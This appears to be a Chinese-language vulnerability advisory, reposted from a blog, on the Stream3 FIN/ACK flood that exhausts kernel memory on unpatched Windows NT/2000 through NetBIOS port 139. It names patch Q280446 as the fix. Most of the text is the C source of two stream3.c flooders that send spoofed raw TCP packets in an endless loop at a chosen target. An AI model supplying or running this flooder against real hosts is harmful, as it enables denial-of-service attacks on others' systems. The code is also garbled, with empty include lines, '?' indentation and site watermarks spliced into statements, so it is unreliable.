Stream3 Flood攻击使Windows NT/2000拒绝服务 (MS,缺陷)

arrous

涉及程式：
Windows NT/2000
  
描述：
Stream3 Flood攻击使Windows NT/2000拒绝服务
  
  
周详：
Stream3 是一种发送ACK和FIN标志的空TCP数据包的flood攻击，以导致服务器的拒绝服务。
没有安装相应补丁的Windows被发现当对其NetBIOS (TCP/139) 端口进行Stream3攻击时，将会导致从non-paged 核心空间泄漏内存。在攻击之后，内存也不能释放。
由于此攻击并无需进行TCP连接，所以攻击数据包往往能够成功地绕过数据报过滤器。
要想成功地进行攻击，依赖于目标机器中安装的RAM数量 ，routing schema 及在本机和目标机器之间链路的带宽。
  
  
解决方案：
微软为win2k发布了补丁Q280446，但是却没有找出NT的补丁。
升级到windows 2000,安装补丁Q280446或SP2
  
攻击方法：
Try stream3.c it should be faster and compatible. stream3o.c is variant of old stream.c. It compiles and works under i386 FreeBSD.
/*
stream3.c - TCP FIN packet flooder
patched from stream.c by 3APA3A, 2000
3APA3A@security.nnov.ru
*/
#include  
bitsCN_com
#include  
#include  
#include  
#include  
#include  
#include  
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include  
#include  
#include  
#include  
#include  
#include  
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
?u_int ip_hl:4, /* header length in 32 bit words */
?????ip_v:4; /* ip version */
?u_char ip_tos; /* type of service */
?u_short ip_len; /* total packet length */
?u_short ip_id; /* identification */
?u_short ip_off; /* fragment offset */
?u_char ip_ttl; /* time to live */
?u_char ip_p; /* protocol */
?u_short ip_sum; /* ip checksum */ www.bitsCN.com
?u_long saddr, daddr; /* source and dest address */
};
struct tcp_hdr {
?u_short th_sport; /* source port */
?u_short th_dport; /* destination port */
?u_long th_seq; /* sequence number */
?u_long th_ack; /* acknowledgement number */
?u_int th_x2:4, /* unused */
?????th_off:4; /* data offset */
?u_char th_flags; /* flags field */
?u_short th_win; /* window size */
?u_short th_sum; /* tcp checksum */
?u_short th_urp; /* urgent pointer */
};
struct tcpopt_hdr {
?u_char type; /* type */
?u_char len; /* length */
?u_short value; /* value */
};
struct pseudo_hdr { /* See RFC 793 Pseudo Header */
?u_long saddr, daddr; /* source and dest address */
?u_char mbz, ptcl; /* zero and protocol */
?u_short tcpl; /* tcp length */
};
struct packet {
?struct ip/*_hdr*/ ip;
?struct tcphdr tcp;
bitscn.com
/* struct tcpopt_hdr opt; */
};
struct cksum {
?struct pseudo_hdr pseudo;
?struct tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
void usage(char *progname)
{
?fprintf(stderr, "Usage: %s    \n",
progname);
?fprintf(stderr, " dstaddr - the target we are trying to attack.\n");
?fprintf(stderr, " dstport - the port of the target, 0 = random.\n");
?fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n");
?exit(1);
}
/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
?register int nleft = len;
?register u_short *w = addr;
?register int sum = 0;
?u_short answer = 0;
www.bitsCN.com
?/* Our algorithm is simple, using a 32 bit accumulator (sum), we add
? * sequential 16 bit words to it, and at the end, fold back all the
? * carry bits from the top 16 bits into the lower 16 bits. */
?while (nleft > 1) {
?? sum += *w++;
?? nleft -= 2;
?}
?/* mop up an odd byte, if necessary */
?if (nleft == 1) {
?? *(u_char *)(&answer) = *(u_char *) w;
?? sum += answer;
?}
?/* add back carry outs from top 16 bits to low 16 bits */
?sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
?sum += (sum >> 16); /* add carry */
?answer = ~sum; /* truncate to 16 bits */
?return(answer);
}
u_long lookup(char *hostname)
{
?struct hostent *hp;
?if ((hp = gethostbyname(hostname)) == NULL) {
??fprintf(stderr, "Could not resolve %s.\n", hostname);
bitscn.com
??exit(1);
?}
?return *(u_long *)hp->h_addr;
}
void flooder(void)
{
?struct timespec ts;
?int i;
?memset(&packet, 0, sizeof(packet));
?ts.tv_sec = 0;
?ts.tv_nsec = 10;
?packet.ip.ip_hl = 5;
?packet.ip.ip_v = 4;
?packet.ip.ip_p = IPPROTO_TCP;
?packet.ip.ip_tos = 0x08;
?packet.ip.ip_id = rand();
?packet.ip.ip_len = FIX(sizeof(packet));
?packet.ip.ip_off = 0; /* IP_DF? */
?packet.ip.ip_ttl = 255;
?packet.ip.ip_dst.s_addr = dstaddr;
?packet.ip.ip_src.s_addr = random();
?packet.ip.ip_sum = 0;
?packet.tcp.th_sum = 0;
?packet.tcp.th_win = htons(16384);
?packet.tcp.th_seq = random();
?packet.tcp.th_ack = 0;
?packet.tcp.th_off = 5; /* 5 */
?packet.tcp.th_urp = 0;
?packet.tcp.th_ack = rand(); 中国网管论坛
?packet.tcp.th_flags = TH_ACK|TH_FIN;
?packet.tcp.th_sport = rand();
?packet.tcp.th_dport = dstport?htons(dstport):rand();
/*
?packet.opt.type = 0x02;
?packet.opt.len = 0x04;
?packet.opt.value = htons(1460);
*/
?s_in.sin_family = AF_INET;
?s_in.sin_port = packet.tcp.th_dport;
?s_in.sin_addr.s_addr = dstaddr;
?cksum.pseudo.daddr = dstaddr;
?cksum.pseudo.saddr = packet.ip.ip_src.s_addr;
?cksum.pseudo.mbz = 0;
?cksum.pseudo.ptcl = IPPROTO_TCP;
?cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
?cksum.tcp = packet.tcp;
?packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
?packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
?for(i=0;;++i) {
??if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) 中国网管论坛
???perror("jess");
?}
}
int main(int argc, char *argv[])
{
?int on = 1;
?printf("stream3.c v0.01 - TCP FIN Packet Flooder\n modified by 3APA3A@security.nnov.ru\n");
?if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) bitsCN_com
?flooder();
?return 0;
}
/*
stream3.c - FIN/ACK flooder
Tested to compile and work under FreeBSD
(c) by 3APA3A @ SECURITY.NNOV, 2000
3APA3A@security.nnov.ru
http://www.security.nnov.ru
Thanx to DarkZorro & Error for discovering this problem
Greetz to void.ru. Get better, Duke!
*/
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_PUSH 0x08
#define TH_ACK 0x10
#define TH_URG 0x20
struct ip_hdr {
?u_int ip_hl:4, /* header length in 32 bit words */
?????ip_v:4; /* ip version */
BBS.bitsCN.com网管论坛
?u_char ip_tos; /* type of service */
?u_short ip_len; /* total packet length */
?u_short ip_id; /* identification */
?u_short ip_off; /* fragment offset */
?u_char ip_ttl; /* time to live */
?u_char ip_p; /* protocol */
?u_short ip_sum; /* ip checksum */
?u_long ip_src, ip_dst; /* source and dest address */
};
struct tcp_hdr {
?u_short th_sport; /* source port */
?u_short th_dport; /* destination port */
?u_long th_seq; /* sequence number */
?u_long th_ack; /* acknowledgement number */
?u_int th_x2:4, /* unused */
?????th_off:4; /* data offset */
?u_char th_flags; /* flags field */
?u_short th_win; /* window size */
?u_short th_sum; /* tcp checksum */
?u_short th_urp; /* urgent pointer */
};
struct pseudo_hdr { /* See RFC 793 Pseudo Header */
?u_long saddr, daddr; /* source and dest address */ 中国.网管联盟
?u_char mbz, ptcl; /* zero and protocol */
?u_short tcpl; /* tcp length */
};
struct packet {
?struct ip_hdr ip;
?struct tcp_hdr tcp;
};
struct cksum {
?struct pseudo_hdr pseudo;
?struct tcp_hdr tcp;
};
u_short dstport=139, srcport=0;
u_long dstaddr, srcaddr=0;
int sock;
void usage(char *progname)
{
?fprintf(stderr,
?"Usage: %s    \n"
?" dstaddr - the target we are trying to attack.\n"
?" dstport - TCP port (139 default).\n"
?" srcaddr - spoofed source address (random default)\n"
?" srcport - spoofed source TCP port (random default)\n", progname);
?exit(1);
}
/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len) bbs.bitsCN.com
{
?register int nleft = len;
?register u_short *w = addr;
?register int sum = 0;
?u_short answer = 0;
?/* Our algorithm is simple, using a 32 bit accumulator (sum), we add
? * sequential 16 bit words to it, and at the end, fold back all the
? * carry bits from the top 16 bits into the lower 16 bits. */
?while (nleft > 1) {
?? sum += *w++;
?? nleft -= 2;
?}
?/* mop up an odd byte, if necessary */
?if (nleft == 1) {
?? *(u_char *)(&answer) = *(u_char *) w;
?? sum += answer;
?}
?/* add back carry outs from top 16 bits to low 16 bits */
?sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
?sum += (sum >> 16); /* add carry */
?answer = ~sum; /* truncate to 16 bits */
?return(answer);
}
u_long lookup(char *hostname) bitsCN.nET中国网管博客
{
?struct hostent *hp;
?if ((hp = gethostbyname(hostname)) == NULL) {
??fprintf(stderr, "Could not resolve %s.\n", hostname);
??exit(-3);
?}
?return *(u_long *)hp->h_addr;
}
void flooder(void)
{
?int i;
?struct packet packet;
???/* use same structure as pseudo packet */
?struct cksum * cksum = (struct cksum *)((char *)&packet + sizeof(struct ip_hdr) - sizeof(struct pseudo_hdr)) ;
?struct sockaddr_in s_in;
?
?memset(&packet, 0, sizeof(packet));
?
?if(!srcaddr)srcaddr = random();
?if(!srcport)srcport = rand();
?packet.tcp.th_win = htons(16384);
?packet.tcp.th_seq = random();
?packet.tcp.th_ack = 0;
?packet.tcp.th_off = 5;
?packet.tcp.th_urp = 0;
?packet.tcp.th_ack = rand();
?packet.tcp.th_flags = TH_ACK|TH_FIN;
BBS.bitsCN.com网管论坛
?packet.tcp.th_sport = htons(srcport);
?packet.tcp.th_dport = htons(dstport);
?cksum->pseudo.daddr = dstaddr;
?cksum->pseudo.saddr = srcaddr;
?cksum->pseudo.mbz = 0;
?cksum->pseudo.ptcl = IPPROTO_TCP;
?cksum->pseudo.tcpl = htons(sizeof(struct tcp_hdr));
?packet.tcp.th_sum = in_cksum((void *)cksum, sizeof(struct cksum));
?packet.ip.ip_hl = 5;
?packet.ip.ip_v = 4;
?packet.ip.ip_p = IPPROTO_TCP;
?packet.ip.ip_tos = 0x08;
?packet.ip.ip_id = rand();
?packet.ip.ip_len = FIX(sizeof(packet));
?packet.ip.ip_off = 0;
?packet.ip.ip_ttl = 255;
?packet.ip.ip_dst = dstaddr;
?packet.ip.ip_src = srcaddr;
?packet.ip.ip_sum = 0;
?packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
?s_in.sin_family = AF_INET;
?s_in.sin_port = htons(dstport);
?s_in.sin_addr.s_addr = dstaddr; bbs.bitsCN.com
?for(i=0;;++i) { /* we do not want to change packet at all */
??if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in))  5)
??usage(argv[0]);
?srand(time(NULL)); /* we needn't too much randomness */
?dstaddr = lookup(argv[1]);
?dstport = atoi(argv[2]);
?if (!dstaddr || !dstport) usage(argv[0]);
?if(argc > 3) srcaddr = lookup(argv[3]);
?if(argc > 4) srcport = atoi(argv[4]);
?if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) bbs.bitsCN.com
?if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))

本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u2/76257/showart_1131362.html